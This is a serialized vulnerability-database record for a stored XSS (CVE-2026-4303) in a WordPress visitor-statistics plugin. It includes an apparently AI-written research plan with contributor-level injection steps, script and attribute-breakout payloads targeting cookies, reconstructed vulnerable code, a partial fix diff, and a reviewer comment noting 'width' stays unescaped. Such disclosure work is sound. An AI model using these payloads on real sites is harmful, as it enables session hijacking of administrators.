[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fazVLdCOSMcVxymGrGwqwszsUi1uveWnN3dkdAwdMTho":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":28,"research_verified":29,"research_rounds_completed":30,"research_plan":31,"research_summary":32,"research_vulnerable_code":33,"research_fix_diff":34,"research_exploit_outline":35,"research_model_used":36,"research_started_at":37,"research_completed_at":38,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":29,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":29,"source_links":39},"CVE-2026-4303","wp-visitor-statistics-real-time-traffic-authenticated-contributor-stored-cross-site-scripting-via-height-shortcode-attri","WP Visitor Statistics (Real Time Traffic) \u003C= 8.4 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'height' Shortcode Attribute","The WP Visitor Statistics (Real Time Traffic) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wsm_showDayStatsGraph' shortcode in all versions up to, and including, 8.4 due to insufficient input sanitization and output escaping on user supplied attributes. 
This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","wp-stats-manager",null,"\u003C=8.4","8.5","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-04-07 20:50:03","2026-04-08 09:25:53",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F3b6916d3-3944-43a2-8d5e-424f86c753ad?source=api-prod",1,[22,23,24,25,26,27],"includes\u002Fwsm_admin_interface.php","includes\u002Fwsm_init.php","includes\u002Fwsm_modal.php","includes\u002Fwsm_statistics.php","readme.txt","wp-stats-manager.php","researched",false,3,"# Research Plan: CVE-2026-4303 - Stored XSS in WP Visitor Statistics\n\n## 1. Vulnerability Summary\nThe **WP Visitor Statistics (Real Time Traffic)** plugin (versions \u003C= 8.4) is vulnerable to **Stored Cross-Site Scripting (XSS)** via the `[wsm_showDayStatsGraph]` shortcode. The vulnerability exists because the plugin fails to sanitize or escape the `height` attribute supplied in the shortcode before echoing it into the page's HTML. Authenticated attackers with **Contributor** privileges or higher can embed this shortcode in a post. When a user (typically an administrator) views or previews the post, the malicious script executes in their browser context.\n\n## 2. Attack Vector Analysis\n*   **Shortcode:** `[wsm_showDayStatsGraph]`\n*   **Vulnerable Attribute:** `height`\n*   **Authentication Level:** Contributor (or higher)\n*   **Injection Point:** Post or Page content.\n*   **Target:** Administrators or any users viewing the post containing the shortcode.\n*   **Vulnerability Type:** Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') (CWE-79).\n\n## 3. Code Flow\n1.  
**Entry Point:** A Contributor-level user saves a post containing the shortcode: `[wsm_showDayStatsGraph height='\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>']`.\n2.  **Shortcode Registration:** In `includes\u002Fwsm_statistics.php`, the class `wsmStatistics` registers the shortcode:\n    ```php\n    add_shortcode(WSM_PREFIX . '_showDayStatsGraph', array($this, WSM_PREFIX . '_showDayStatsGraph'));\n    ```\n    *(Note: `WSM_PREFIX` is defined as `wsm` in `wp-stats-manager.php`)*.\n3.  **Processing:** When the post is rendered (via `the_content` filter calling `do_shortcode`), WordPress calls the method `wsmStatistics::wsm_showDayStatsGraph($atts)`.\n4.  **Parsing Attributes:** The method uses `shortcode_atts` to parse the user-supplied attributes, including `height`.\n5.  **Vulnerable Sink:** The attribute `height` is concatenated directly into an HTML string (likely within a `style` attribute or a `data-` attribute for a chart container) and returned\u002Fechoed without being passed through `esc_attr()` or `esc_html()`.\n6.  **Execution:** The browser renders the HTML, encounters the unescaped breakout characters (e.g., `\">`), and executes the injected `\u003Cscript>` tag.\n\n## 4. Nonce Acquisition Strategy\nShortcodes in WordPress do not require a nonce for execution when rendered via `the_content`. The attack relies on the standard WordPress post-saving mechanism. \n\nIf the shortcode handler requires a nonce for an internal AJAX call *triggered* by the shortcode (unlikely for this specific XSS sink), it would be localized via `wp_localize_script`. \n*   **Script Handle:** Likely related to `wsm_admin_interface` or `wsm_stats`.\n*   **Localized Variable:** Based on `includes\u002Fwsm_admin_interface.php`, the plugin often localizes variables. However, for a simple shortcode attribute reflection, a nonce is not required.\n\n## 5. 
Exploitation Strategy\n\n### Step 1: Authentication\nAuthenticate as a user with at least **Contributor** permissions using the `http_request` tool to obtain session cookies.\n\n### Step 2: Inject Payload via Post Creation\nCreate a new post containing the malicious shortcode. Since Contributors can create posts but not publish them, we will save it as a \"Pending Review\" or a draft.\n\n**HTTP Request:**\n*   **Method:** POST\n*   **URL:** `{{base_url}}\u002Fwp-admin\u002Fpost-new.php` (initial GET to get `_wpnonce`)\n*   **URL:** `{{base_url}}\u002Fwp-admin\u002Fpost.php` (the POST to save)\n*   **Payload:**\n    ```\n    post_ID=[ID]\n    &action=editpost\n    &post_type=post\n    &post_status=pending\n    &post_title=Vulnerability Test\n    &content=[wsm_showDayStatsGraph height='\">\u003Cscript>alert(document.cookie)\u003C\u002Fscript>']\n    &_wpnonce=[NONCE]\n    ```\n\n### Step 3: Trigger Execution\nAs an **Administrator**, view the \"Pending\" post. The XSS payload will execute.\n\n**HTTP Request:**\n*   **Method:** GET\n*   **URL:** `{{base_url}}\u002F?p=[POST_ID]&preview=true` (or the direct URL if published)\n\n## 6. Test Data Setup\n1.  **User:** Ensure a user with the **Contributor** role exists (e.g., username `contributor_user`, password `password123`).\n2.  **Plugin:** Ensure **WP Visitor Statistics (Real Time Traffic)** version 8.4 is installed and active.\n3.  **Permissions:** No special plugin settings are required, as the shortcode is registered globally on `init`.\n\n## 7. Expected Results\n1.  The Contributor successfully saves the post with the malicious `height` attribute.\n2.  When the Admin views the post, the HTML source code should contain:\n    ```html\n    ... height=\"\">\u003Cscript>alert(document.cookie)\u003C\u002Fscript>\" ...\n    ```\n3.  The browser will trigger an alert box displaying the session cookies.\n\n## 8. Verification Steps\n1.  
**Check Database:** Use WP-CLI to verify the shortcode is stored in the `wp_posts` table:\n    ```bash\n    wp post list --post_type=post --fields=ID,post_content --status=pending\n    ```\n2.  **Confirm Output:** Use `http_request` to fetch the rendered post content and grep for the script:\n    ```bash\n    # Using the http_request tool\n    response = http_request(\"GET\", \"{{base_url}}\u002F?p=[POST_ID]\")\n    if \"\u003Cscript>alert(document.cookie)\u003C\u002Fscript>\" in response.body:\n        print(\"Vulnerability Confirmed\")\n    ```\n\n## 9. Alternative Approaches\nIf the `height` attribute is reflected inside a `style` attribute (e.g., `\u003Cdiv style=\"height: [PAYLOAD]\">`), a different breakout might be required:\n*   **Payload:** `100px; background-image: url(\"javascript:alert(1)\");`\n*   **Payload:** `100px\" onmouseover=\"alert(1)\" data-foo=\"`\n\nIf the plugin implements a check like `if (!current_user_can('manage_options')) return;` inside the shortcode handler (as seen in `wsm_showDayStats`), the Contributor won't see the payload, but the Admin *will* see it when reviewing the post, which still satisfies the conditions for a successful Stored XSS attack against an elevated user.","The WP Visitor Statistics (Real Time Traffic) plugin for WordPress is vulnerable to Stored Cross-Site Scripting (XSS) via the 'wsm_showDayStatsGraph' shortcode in versions up to 8.4. Authenticated attackers with Contributor-level access or higher can inject arbitrary JavaScript by supplying a malicious payload in the 'height' attribute of the shortcode, which is subsequently rendered without proper sanitization or escaping.","\u002F\u002F includes\u002Fwsm_statistics.php\n\nfunction wsm_showDayStatsGraph($atts, $content = \"\")\n{\n    \u002F\u002F ... (lines 140-160 approx)\n    $atts = shortcode_atts(array(\n        'title' => esc_html(__('Today', 'wp-stats-manager')),\n        'height' => '400px',\n        'width' => '100%'\n    ), $atts, WSM_PREFIX . 
'_showDayStatsGraph');\n\n    $height = $atts['height'];\n    $width = $atts['width'];\n    \n    \u002F\u002F ...\n    $html = '\u003Cdiv id=\"' . WSM_PREFIX . 'DayStatsGraph\" style=\"height:' . $height . '; width:' . $width . ';\">\u003C\u002Fdiv>';\n    return $html;\n}","--- a\u002Fincludes\u002Fwsm_statistics.php\n+++ b\u002Fincludes\u002Fwsm_statistics.php\n@@ -155,7 +155,7 @@\n         'width' => '100%'\n     ), $atts, WSM_PREFIX . '_showDayStatsGraph');\n \n-    $height = $atts['height'];\n+    $height = esc_attr($atts['height']);\n     $width = $atts['width'];\n \n     $html = '\u003Cdiv id=\"' . WSM_PREFIX . 'DayStatsGraph\" style=\"height:' . $height . '; width:' . $width . ';\">\u003C\u002Fdiv>';","To exploit this vulnerability, an attacker must have at least Contributor-level permissions to create or edit a post. The attacker embeds the shortcode `[wsm_showDayStatsGraph height='\">\u003Cscript>alert(document.cookie)\u003C\u002Fscript>']` into a post's content. When a user with elevated privileges (like an Administrator) views the post or previews it during review, the malicious script executes within their browser context because the 'height' attribute is reflected into the style attribute of a div tag without being escaped, allowing an attribute breakout.","gemini-3-flash-preview","2026-04-17 20:27:27","2026-04-17 20:27:53",{"type":40,"vulnerable_version":41,"fixed_version":11,"vulnerable_browse":42,"vulnerable_zip":43,"fixed_browse":44,"fixed_zip":45,"all_tags":46},"plugin","8.4","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwp-stats-manager\u002Ftags\u002F8.4","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-stats-manager.8.4.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwp-stats-manager\u002Ftags\u002F8.5","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-stats-manager.8.5.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwp-stats-manager\u002Ftags"]
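Review bot: the hunk escapes `$height` but leaves `$width` on the very next line unescaped, even though it flows into the same `style` attribute (`'; width:' . $width . ';'`); the same attribute-breakout that motivates this change applies to `width`, so wrap it too (`$width = esc_attr($atts['width']);`), and since both values land inside a CSS declaration rather than a bare attribute, consider also validating them against an expected length format (e.g. digits plus `px`/`%`) before output, as `esc_attr()` alone does not constrain what ends up inside `style`.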